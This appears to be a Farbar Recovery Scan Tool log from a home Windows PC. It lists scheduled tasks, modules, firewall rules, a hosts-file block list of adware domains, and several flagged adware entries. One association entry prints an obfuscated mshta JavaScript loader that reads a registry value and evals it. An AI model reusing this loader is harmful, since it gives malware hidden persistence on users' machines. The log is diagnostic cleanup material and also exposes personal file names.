Task: {046FA54B-8FEB-4489-8A1C-DC83869BCAEA} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1169555862-3845460206-1416485692-1000Core => C:\Users\Kenneth\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-11] (Facebook Inc.)
Task: {0867B664-EF32-42F5-8757-C15E298A230B} - System32\Tasks\{6618EADD-5989-4B12-8B04-AA89D2E1DBD4} => pcalua.exe -a C:\Users\Kenneth\Downloads\jxpiinstall(3).exe -d C:\Users\Kenneth\Downloads
Task: {0C0B6D96-5055-4533-A931-4E84A6877704} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\SymErr.exe [2016-11-11] (Symantec Corporation)
Task: {18DBBA8E-3815-4955-BFA4-9FB4DB13AAB1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {1AD20DEC-F5A8-4D26-8D07-2C36DA3BD744} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-08] (Adobe Systems Incorporated)
Task: {219B9AB8-6B65-49C1-A3D9-0C452968D8BF} - System32\Tasks\{42B4231A-778C-4762-8421-2BAE54306AE0} => pcalua.exe -a E:\setup.exe -d E:\
Task: {21D6B5D4-9D5A-4DF2-933D-86A55FC3E250} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {3014BA90-0A47-4A17-B9CF-3E9866A2F723} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2014-10-29] ()
Task: {4206DE6A-8B8F-40A6-A138-F60AAD80BF02} - System32\Tasks\PCM_Kenneth_PCMedic_RS_WeeklyTask => C:\Program Files (x86)\PC Medic\PCMedic.exe [2016-11-08] ()
Task: {42D93A95-1A61-421E-9B8C-5046D971BE5A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-08-08] (HP Inc.)
Task: {4B717A1C-5CF1-4A55-AACB-24D31C5F951F} - System32\Tasks\{10EF5062-FADE-4238-95E4-4EA61663B88F}-Kodak Share Button App Camera detect => C:\Program Files (x86)\Kodak\KODAK Share Button App\Listener.exe [2012-06-26] (Eastman Kodak Company)
Task: {4BB9D14A-783E-4231-8FFB-4D683F47BF66} - System32\Tasks\HPCeeScheduleForKenneth => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-13] (Hewlett-Packard)
Task: {7030256D-B976-4409-BE5D-55A265795D6D} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1169555862-3845460206-1416485692-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2014-10-26] (RealNetworks, Inc.)
Task: {74253863-F451-4B03-B82B-7418AFEA2672} - System32\Tasks\Run RoboForm TaskBar Icon => C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe [2016-09-02] (Siber Systems)
Task: {8255EDFB-5FDD-47B5-931D-A7ECD9ECC5A4} - System32\Tasks\Open URL by RoboForm => Rundll32.exe url.dll,FileProtocolHandler "hxxp://www.roboform.com/test-pass.html?aaa=KICMJJOJIMPMGMOMLMMMCNJJMJMMJJCNLMMMHMGMCNHMOJMMKJCNOJGMIMOJMMOJLMPMKJJMGMKMJNJICMIMCNGMCNNMOMFMOMOMCNPMCNGMJMPMPMFMJMCNOMCNIMJMPMOMCNNMJNPICMPMFMEKMICNJJCKFMOMHMLMGMJNHICMLIHJKJMIPIJNBJCMELKJBJBJKJLIHJPNNLOJNINJKJNIJNKJCMJNNICM (the data entry has 63 more characters).
Task: {85CFB42F-580C-4345-BEAD-D156DBB0DEA8} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1169555862-3845460206-1416485692-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2014-10-26] (RealNetworks, Inc.)
Task: {98FDD12B-0791-4B62-94E4-0105B54D9943} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2012-09-05] (Hewlett-Packard Company)
Task: {9D00F211-D8A6-406F-A743-BFBF4E173495} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe [2013-10-22] (Hewlett-Packard)
Task: {A769168B-7530-414F-9E3B-DE3D63477E3F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {C00778D9-731F-4909-AA4B-7624CBE56715} - System32\Tasks\HPCeeScheduleForKENNETH-HP$ => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-13] (Hewlett-Packard)
Task: {C829ACB1-69A6-474F-92E0-496B3FDA5054} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\SymErr.exe [2016-11-11] (Symantec Corporation)
Task: {CC7E65C3-6361-4D7E-B8AC-593EC7CDC357} - \ReimageUpdater -> No File <==== ATTENTION
Task: {D1EF9990-27A6-4820-9055-EE6291234B77} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\WSCStub.exe [2016-11-11] (Symantec Corporation)
Task: {D8332300-F055-49B7-8894-04AA2F6BD723} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-10-21] (Adobe Systems Incorporated)
Task: {E3415C48-224C-4CDC-BB59-E67B14BC477E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe [2013-10-22] (Hewlett-Packard)
Task: {E60702F8-6315-41FA-AA40-BBCF9AEA6D6B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {EB2C33E8-E909-4C97-9EC7-FA6F0CA0494D} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Internet Security\Upgrade.exe [2016-11-11] (Symantec Corporation)
Task: {EC581DF9-A899-4B72-A3BD-B5DE8CB858BD} - System32\Tasks\PCM_Kenneth_PCMedic_LogonTask => C:\Program Files (x86)\PC Medic\PCMedic.exe [2016-11-08] ()
Task: {EDED2E7E-A3D1-46D0-8A2E-94E32A2E3006} - System32\Tasks\Optimum_LogOn => C:\Program Files (x86)\Optimum PC Boost\OptimumPCBoost.exe <==== ATTENTION
Task: {F1337489-73D7-469D-A675-7BC1D57D524D} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {FAA3495A-3D90-4C80-BE45-F8DE4E9C9DFE} - \Optimum_Daily -> No File <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1169555862-3845460206-1416485692-1000Core.job => C:\Users\Kenneth\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1169555862-3845460206-1416485692-1000UA.job => C:\Users\Kenneth\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForKENNETH-HP$.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\HPCeeScheduleForKenneth.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\Kenneth\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --use-spdy=off --disable-quic
ShortcutWithArgument: C:\Users\Kenneth\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --use-spdy=off --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --use-spdy=off --disable-quic
 
==================== Loaded Modules (Whitelisted) ==============
 
2011-03-09 21:59 - 2011-03-09 21:59 - 00079872 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Services.dll
2011-03-09 22:00 - 2011-03-09 22:00 - 00073728 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2016-09-01 17:12 - 2016-09-01 17:12 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-10-05 17:17 - 2016-10-05 17:17 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-03-13 11:30 - 2013-01-26 16:52 - 00623616 _____ () C:\Program Files (x86)\Free Desktop Timer\DesktopTimer.exe
2014-10-29 19:06 - 2014-10-29 19:06 - 00560192 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
2016-01-19 01:41 - 2016-01-18 16:27 - 00013312 _____ () C:\Program Files (x86)\IDriveWindows\SqliteWrapper.dll
2016-01-19 01:41 - 2015-11-25 13:03 - 00834048 _____ () C:\Program Files (x86)\IDriveWindows\sqlite3.dll
2016-01-19 01:41 - 2015-11-25 13:03 - 00412672 _____ () C:\Program Files (x86)\IDriveWindows\Sync.dll
2011-03-09 22:00 - 2011-03-09 22:00 - 00103424 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2011-03-09 22:05 - 2011-03-09 22:05 - 00243712 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-03-14 13:20 - 2011-03-14 13:20 - 00098304 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2014-10-26 22:59 - 2014-10-26 22:59 - 00039568 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
2014-10-30 05:41 - 2014-10-30 05:41 - 00031856 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
2016-01-19 01:41 - 2016-01-18 16:27 - 00043520 _____ () C:\Program Files (x86)\IDriveWindows\RemoteManagement.dll
2016-10-05 17:18 - 2016-10-05 17:18 - 01041720 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-09-01 17:13 - 2016-09-01 17:13 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-10-05 17:18 - 2016-10-05 17:18 - 00189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2014-10-29 19:01 - 2014-10-29 19:01 - 01382048 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\cpprest100_1_2.dll
2014-10-29 19:07 - 2014-10-29 19:07 - 00065600 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\dtvhooks.dll
2013-03-27 17:17 - 2012-09-14 13:34 - 00046352 _____ () C:\Program Files (x86)\PRTG Network Monitor\PaesslerTrafficControl.dll
2014-08-08 14:38 - 2014-12-13 10:43 - 00865880 _____ () c:\program files (x86)\real\realplayer\RPDS\Plugins\cldplin.dll
2014-10-30 05:41 - 2014-10-30 05:41 - 00035976 _____ () C:\Program Files (x86)\Real\UpdateService\DL2UpdatePlugin.dll
2014-10-30 05:41 - 2014-10-30 05:41 - 00039560 _____ () C:\Program Files (x86)\Real\UpdateService\RealDownloaderUpdatePlugin.dll
2014-10-30 05:41 - 2014-10-30 05:41 - 00032888 _____ () C:\Program Files (x86)\Real\UpdateService\RPDSUpdatePlugin.dll
2016-11-14 16:06 - 2016-11-08 14:29 - 01819240 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\libglesv2.dll
2016-11-14 16:06 - 2016-11-08 14:29 - 00093288 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\libegl.dll
2016-11-10 04:18 - 2016-11-10 04:18 - 17772736 _____ () C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\PepperFlash\23.0.0.207\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Temp:9A870F8B [1026]
AlternateDataStreams: C:\Users\Kenneth\Documents\bjbirthcert.jpeg:3or4kl4x13tuuug3Byamue2s4b [89]
AlternateDataStreams: C:\Users\Kenneth\Documents\bjbirthcert.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Kenneth\Documents\brail.jpeg:3or4kl4x13tuuug3Byamue2s4b [89]
AlternateDataStreams: C:\Users\Kenneth\Documents\brail.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Kenneth\Documents\longhorn2.jpeg:3or4kl4x13tuuug3Byamue2s4b [89]
AlternateDataStreams: C:\Users\Kenneth\Documents\longhorn2.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Classes\f8352: "C:\Windows\system32\mshta.exe" "javascript:XxlS4cy="HKwVZ";O8J=new ActiveXObject("WScript.Shell");d4j0JLhge="QDOFAhq";WKvH9=O8J.RegRead("HKCU\\software\\ukrhxxcou\\juhzam");sQy6IohL="B1e";eval(WKvH9);mnuifr2W="siKZsvU";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 20:34 - 2016-11-23 18:04 - 00002021 ____A C:\Windows\system32\Drivers\etc\hosts
 
0.0.0.1 mssplus.mcafee.com0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
0.0.0.0 media.opencandy.com
0.0.0.0 cdn.opencandy.com
0.0.0.0 tracking.opencandy.com
0.0.0.0 api.opencandy.com
0.0.0.0 installer.betterinstaller.com
0.0.0.0 installer.filebulldog.com
0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
0.0.0.0 inno.bisrv.com
0.0.0.0 nsis.bisrv.com
0.0.0.0 cdn.file2desktop.com
0.0.0.0 cdn.goateastcach.us
0.0.0.0 cdn.guttastatdk.us
0.0.0.0 cdn.inskinmedia.com
0.0.0.0 cdn.insta.oibundles2.com
0.0.0.0 cdn.insta.playbryte.com
0.0.0.0 cdn.llogetfastcach.us
0.0.0.0 cdn.montiera.com
0.0.0.0 cdn.msdwnld.com
0.0.0.0 cdn.mypcbackup.com
0.0.0.0 cdn.ppdownload.com
0.0.0.0 cdn.riceateastcach.us
0.0.0.0 cdn.shyapotato.us
0.0.0.0 cdn.solimba.com
0.0.0.0 cdn.tuto4pc.com
0.0.0.0 cdn.appround.biz
0.0.0.0 cdn.bigspeedpro.com
0.0.0.0 cdn.bispd.com
0.0.0.0 cdn.bisrv.com
 
There are 3 more lines.
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Kenneth\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 24.116.0.53 - 24.116.2.50
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{A361AB6A-BE7C-4BBB-9381-B519E56361B9}] => (Allow) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowShell.exe
FirewallRules: [{390E4007-52A3-46D8-9442-FA88B81D0F4B}] => (Allow) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowShell.exe
FirewallRules: [{D0D8B429-1205-433A-98A9-17BCA43D6274}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\RoxioNow\RNow.exe
FirewallRules: [{1252E0AD-8A00-4624-A1CA-B940B14585CD}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\RoxioNow\RNow.exe
FirewallRules: [{5A6EE383-4327-4C24-85E3-BB4A3E1DE5DB}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{B97C8BE8-58B3-4B23-BAD7-8C81967E75F4}] => (Allow) LPort=2869
FirewallRules: [{EF68CE7B-58D1-486F-BC74-3E07C31C64F7}] => (Allow) LPort=1900
FirewallRules: [{D18F620E-D6CF-4381-A11E-5C28F8007AC4}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{4D838AE2-8AD9-4CFC-A502-E8BAEEBE574B}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{C9E34393-F1E7-481A-BF10-0A8651BD7928}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{E0C1AA66-15D8-4E25-A5C6-7724EE63B2FF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{C1F60360-6FF9-447F-8EE3-055BD8644A5F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{EED25791-BDAE-48BD-838D-3D354D3140C3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{FADF58C6-11E7-4B9E-9661-86FC17686456}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{A7EA9B5E-5BC8-492E-80AE-EEE47D55A913}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{996FEA8E-3B41-486F-B668-79973FF1D6B9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{833EE07D-BFBD-4458-A214-AEED0FB0DDDE}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{57CE7C8D-68A6-4541-9077-7440CAB8A84D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{8E32C9F9-0076-46F1-81C3-8F7128B52308}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{1C89CFF2-F8E0-4C36-BB13-D92076A72272}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{9CBADE19-95DB-484B-B2E9-40BD2CEA52C4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{E09A3255-00F9-4B81-9DFA-167543072E23}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{D4D4407C-7535-46C3-BD57-7EF4000E97AD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{778B211F-6B5E-4CA1-88B4-70EB25007D73}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{5EDEC4A3-8454-4CD9-87F9-E83C8542B17F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{FA40A372-6822-405D-8653-78A0DB9C8542}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{64756097-4246-4A25-8FE0-FFF8BE3A678F}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [{0133508E-A28F-4081-835E-C6858890388C}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Remote Graphics Receiver\rgreceiver.exe
FirewallRules: [{51EFAEE1-ACBB-429D-A06A-D769A64F26B8}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Remote Graphics Receiver\rgreceiver.exe
FirewallRules: [{40EF4CCB-6623-447E-A4A4-5498F2BBF551}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP LinkUp\HP LinkUp Viewer.exe
FirewallRules: [{75AA34B1-E013-4AE7-9DAD-03777B765C69}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP LinkUp\HP LinkUp Viewer.exe
FirewallRules: [{FE1F8CC6-8613-43AD-80B7-44EA0F8B0EDB}] => (Allow) C:\Program Files (x86)\Mileage Plus Shopping Toolbar\TroubleShooter.exe
FirewallRules: [{21A92CE0-90EE-4417-8833-A23F2C685660}] => (Allow) C:\Program Files (x86)\Mileage Plus Shopping Toolbar\TroubleShooter.exe
FirewallRules: [{FCF03C8E-F9BC-43AD-8DEF-595A83BFB58C}] => (Allow) C:\Program Files (x86)\Mileage Plus Shopping Toolbar\ToolbarUpdate.exe
FirewallRules: [{045C786E-3F86-476E-B40C-8F9D3937BB7F}] => (Allow) C:\Program Files (x86)\Mileage Plus Shopping Toolbar\ToolbarUpdate.exe
FirewallRules: [{6B2A80EF-EF84-4DC5-ABB2-0C0F2B046A34}] => (Allow) C:\Program Files (x86)\Mob Wars Toolbar\TroubleShooter.exe
FirewallRules: [{7D27231E-2984-495B-9E02-296164FBF9DA}] => (Allow) C:\Program Files (x86)\Mob Wars Toolbar\TroubleShooter.exe
FirewallRules: [{3C85B792-1206-4629-B18C-B879233E5E80}] => (Allow) C:\Program Files (x86)\Mob Wars Toolbar\ToolbarUpdate.exe
FirewallRules: [{30545CB1-E8FD-43C5-A207-E70A43B9012D}] => (Allow) C:\Program Files (x86)\Mob Wars Toolbar\ToolbarUpdate.exe
FirewallRules: [TCP Query User{B12B6382-1886-40CC-8D7C-A313B55E5CF2}C:\users\kenneth\appdata\roaming\mjusbsp\magicjack.exe] => (Allow) C:\users\kenneth\appdata\roaming\mjusbsp\magicjack.exe
FirewallRules: [UDP Query User{D232F379-C78F-4108-B8BB-72A79F01F4CF}C:\users\kenneth\appdata\roaming\mjusbsp\magicjack.exe] => (Allow) C:\users\kenneth\appdata\roaming\mjusbsp\magicjack.exe
FirewallRules: [{CFE975E5-A80D-4756-87A6-5072B02D61F6}] => (Allow) LPort=5353
FirewallRules: [{E9686BC6-5DC9-4DF2-AB8B-76BDC2DFC224}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{1E63AE00-AD5D-4FF0-B953-E014D09A36DF}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeCam.exe
FirewallRules: [{6A36AC7C-1202-4245-888F-04D68BD377B1}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeCam.exe
FirewallRules: [{DB8D4C43-A65D-4E15-AAB2-AA73BD8B20BD}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe
FirewallRules: [{9CD15341-1FBB-437A-B692-424783F26EFD}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe
FirewallRules: [{FB7CC677-D6D9-422C-8DFA-0237FFA52446}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe
FirewallRules: [{C382408B-23CD-415F-8C5E-7AA97D2E84D8}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe
FirewallRules: [{71ABBDA4-A197-46B1-9FDF-2B20F40DB37A}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe
FirewallRules: [{4851EBE9-DB80-4743-80AC-28559A6A7D60}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe
FirewallRules: [{2010593A-B890-4975-99B3-FBA073E9FF37}] => (Allow) C:\Program Files (x86)\PRTG Network Monitor\64 bit\PRTG Server.exe
FirewallRules: [{F8ED11B8-411C-42E7-A9F5-7D7B71AAB14D}] => (Allow) C:\Program Files (x86)\PRTG Network Monitor\PRTG Server.exe
FirewallRules: [{2E4ED36C-D620-4313-B712-484445BDED41}] => (Allow) C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe
FirewallRules: [{99962375-3721-493B-A260-455F60EE2F37}] => (Allow) C:\Program Files (x86)\PRTG Network Monitor\PRTG Server Administrator.exe
FirewallRules: [{8CD4ED08-2F8D-46C9-A306-F809BC204A24}] => (Allow) C:\Program Files (x86)\MyPoints Toolbar\TroubleShooter.exe
FirewallRules: [{8F147638-D049-421D-AD1B-AA322E293AB1}] => (Allow) C:\Program Files (x86)\MyPoints Toolbar\TroubleShooter.exe
FirewallRules: [{059B8AA7-8EB3-4125-A408-298F053B7CB2}] => (Allow) C:\Users\Kenneth\AppData\Roaming\Allmyapps\Allmyapps.exe
FirewallRules: [{C4191164-781E-4A04-9C5F-A3721235F959}] => (Allow) C:\Users\Kenneth\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [{56EF08B8-F89F-4C6A-B8C5-CE155FA39C30}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [{761A43CB-5C61-40AD-B8CD-3F2D442320DF}] => (Allow) C:\Program Files (x86)\MR APP\MRAPP.UI.exe
FirewallRules: [{442673CF-6434-4CA0-B0B0-1B27434725CD}] => (Allow) C:\Program Files (x86)\MR APP\MRAPP.Transfer.Service.exe
FirewallRules: [{6500D20F-E475-42AF-80B6-0ED0DB49ACF7}] => (Allow) C:\Program Files (x86)\MR APP\MRAPP.Event.Service.exe
FirewallRules: [{C715BEBE-36EA-4E98-909A-C9D4334E7AA2}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1FA54504-0F26-411A-8DF9-856368C4767A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{54053DB0-70AB-458A-892F-7BC975AB6CA2}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{70C6B85A-01B9-4CEC-B946-659B996F7224}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{6D03B91D-7F0D-4363-8CA7-8B4EA25728D1}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{68B87A30-588E-4985-ADD0-44C153EFB3D9}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{39DB4297-9BC6-4A55-A4F6-671C80B54C14}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{34D6986A-6A46-4D56-857F-1C1B66ACBBEE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A7D53FC1-6B2C-490B-BBC7-9B0289B4FAFD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 
==================== Restore Points =========================
 
13-11-2016 14:08:34 Windows Update
16-11-2016 00:23:28 Windows Update
19-11-2016 12:10:06 Removed Java 8 Update 111
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/23/2016 06:05:04 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/23/2016 10:14:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
